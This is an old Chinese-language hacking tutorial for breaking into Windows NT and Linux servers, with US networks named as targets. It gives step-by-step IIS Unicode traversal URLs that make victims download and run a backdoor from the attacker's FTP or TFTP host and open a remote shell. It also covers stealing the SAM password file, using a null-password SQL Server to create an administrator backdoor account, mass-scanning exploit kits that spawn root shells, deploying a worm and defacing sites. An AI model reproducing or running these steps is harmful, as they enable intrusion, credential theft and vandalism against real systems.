|
uid=0(root) gid=0(root) group=0(root)
*****1.NT入侵*****
1. 工具下载 (X-Scanner)扫描NT UNICODE漏洞的库我重新更新过!
2. 工具下载(SQLExec.zip)
3. 工具下载 (unicode.zip)
* NT 入侵过程扫描
用X-Scanner扫描美国网段
当然是扫描CGI漏洞,SQL-SERVER默认帐户,NT弱口令。
**************************************NT UNICODE 漏洞***************************************
方法
1.找个可以ftp上传的主机,比如说你以前黑过的,或者是某个可以公用ftp的主机, 把要上传到目标主机上的文件srv.exe传上去(ncx99(在工具下载的unicode.zip里面),用于开个99端口telnet上去) 假如这个ftp主机的ip是:1.1.1.1 username:tom passwd:pass 2,假如你要黑的目标主机的ip是2.2.2.2,先把目标主机的cmd.exe copy成/scripts/ccc.exe,为了方便操作和避免iis加载程序时检测特殊字符出问题。 http://2.2.2.2/scripts/..%c1%1c. ... /cmd.exe?/c copy c:\winnt\system32\cmd.exe d:\inetpub\scripts\ccc.exe 3,编辑一个上传执行文件,再利用ftp -s命令上传文件到scripts目录中。 http://2.2.2.2/scripts/ccc.exe?/c echo open 202.99.168.15 > C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo name >> C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo ****1234 >>C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/ ... htm >>> C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c echo quit>>C:\Inetpub\wwwroot\n3\up.txt http://2.2.2.2/scripts/ccc.exe?/c ftp -s:up.txt 4,运行srv.exe,然后就可以telnet上去。 http://2.2.2.2/scripts/srv.exe 之后你就可以telnet 2.2.2.2 99后发现 c:\inetpub\scripts\_ 提示符就在你面前了。 对于NT4,还可以把它的sam._抓下来破解,WIN2000的sam.已没有用了。 http://2.2.2.2/scripts/ccc.exe?/c copy d:\winnt\repair\sam._ d:\inetpub\wwwroot 在用 http://2.2.2.2/sam._把它抓下来,用msdos下的命令 expand sam._ SAM. 把SAM.带回去再用l0pht解开吧。
2.如果你嫌烦的话。在IE里打上 http://xxx.xxx.xxx.xxx/.ida看他的绝对目录!(如果目录为c:\inetpub\wwroot)
只要把他/winnt/system32/cmd.exe拷贝到一个可执行目录并改名为ccc.exe( 如果目录为scripts)
http:/xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo **** usa > c:\inetpub\wwwroot\default.html
你就把他的主页改为**** us了!
3.关于用unicode上传文件的另一种方法
开始: 现在我们找到的一台漏洞主机:202.100.100.1(假设) 当然下面的调用大家再熟悉不过: http://202.100.100.1/scripts/..% ... 2/cmd.exe?/c+dir+c:\ 目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。 但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。 经过比较,让服务器下载木马的方法较好: 首先,下载 http://www.cners.com/tools/unicode.zip 解压后有如下文件: tftpd32.exe(一个FTP服务器) ncx99.exe(telnet 到99端口) 这两个大家都熟悉吧,其他的不用管。 运行tftpd32.exe 这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。 回到你的浏览器,在地址栏里填入: http://202.100.100.1/scripts/..% ... ?? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe ???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情 况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。 然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。 再使用如下调用来执行ncx99.exe(sr.exe) http://202.100.100.1/scripts/..% ... tem32/cmd.exe?/c+c:\inetpub\scripts\sr.exe 然后您就可以 telnet 202.100.100.1 99
**************************************SQL SERVER漏洞入侵*************************************
用X-Scanner扫到美国主机1433 sa=null
你就用到工具下载里面的SQLExec.zip了。
解压后。
c:\SQLExec xxx.xxx.xxx.xxx.xxx(美国网站)
-----------------------出现远程命令行的界面 ---------------------------------------------------
SQLCmd>_ 因此!我添加了一个后门帐号!(因为其站上只有一个Adminstrator帐号! 我将Guest用户激活 SQLCmd>net user guest /actives net user guest /active:yes
The command completed successfully. 命令成功执行!!!
SQLCmd>net user guest 123456/*添加后门帐号密码!*/
net user guest 123456 The command completed sucessfully.
SQLCmd>net localgroup administrator guest /add /*将GUEST加入管理员组---当然你也可以该admin密码*/ net lovalgroup administrator guest /add The command completed successfully.
这样你就可以远程登入上去了。当然你的系统是NT !!
C:\ net use \\xxx.xxx.xxx.xxx\ipc$ "123456" /user:"guest"
The command completed sucessfully
登上去了
c:\net use y: \\xxx.xxx.xxx.xxx\c$
The command completed sucessfully
把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧!
**************如果你的系统是98系列
你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号:guest 密码:123456
然后在你的MS-DOS下
c:\net use \\xxx.xxx.xxx.xxx\ipc$ (你不用在这里填写密码帐号了)
The command completed sucessfully (命令成功执行)
下面的方法和前面一样了!!!!
**********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************
***********************************对美国linux主机的入侵***********************************
首先你的要有个Linux肉鸡。不过你用linux拨号上网的更好!!
工具下载redbind.tgz 针对 bind 8.2 8.2.1 8.2.2 8.2.2-PX
工具下载redseclpd.tgz 针对redhat linux 7.0
工具下载redstatdx.tgz 针对 redhat linux系列
工具下载redftp.tgz 针对 wuftpd 2.6.0
********************举例:redbind.tgz 另外几个工具使用说明差不多 *****************************
用普通账号登陆linux
redcrack$tar xvzf bind.tgz 解压缩
redcrack$cd /redbind 进redbind目录
redcrack$./redbind 208 44就开始扫描208.44 B类网!并自动攻击!
如果攻击到有漏洞的主机 并且溢出成功会自动出来一个root shell
你可以 /usr/sbin/adduser www /*开个www账号*/
/usr/bin/passwd www /*给他加个密码*/
(提高权限的方法是 su.c只要你ftp上传上去 gcc -o su su.c编译一下。再执行一下就变为root了!:-))
想退出shell 就按ctrl+c后继续扫描 (按一次就够多按了会退出扫描的)
如果扫描停顿也可按ctrl+c后继续扫描
提供1i0n编写的蠕虫!!!
使用方法是(在你拿到普通帐号的前提下)
用su.c变为root!
cd到/dev目录 mkdir lib开个lib目录
cp /home/www/1i0n.tgz /dev/lib /*把1i0n.tgz copy到/dev/lib里面*/
tar xvzf 1i0n.tgz 后执行./1i0n.sh
替换掉他的主页了!! |
|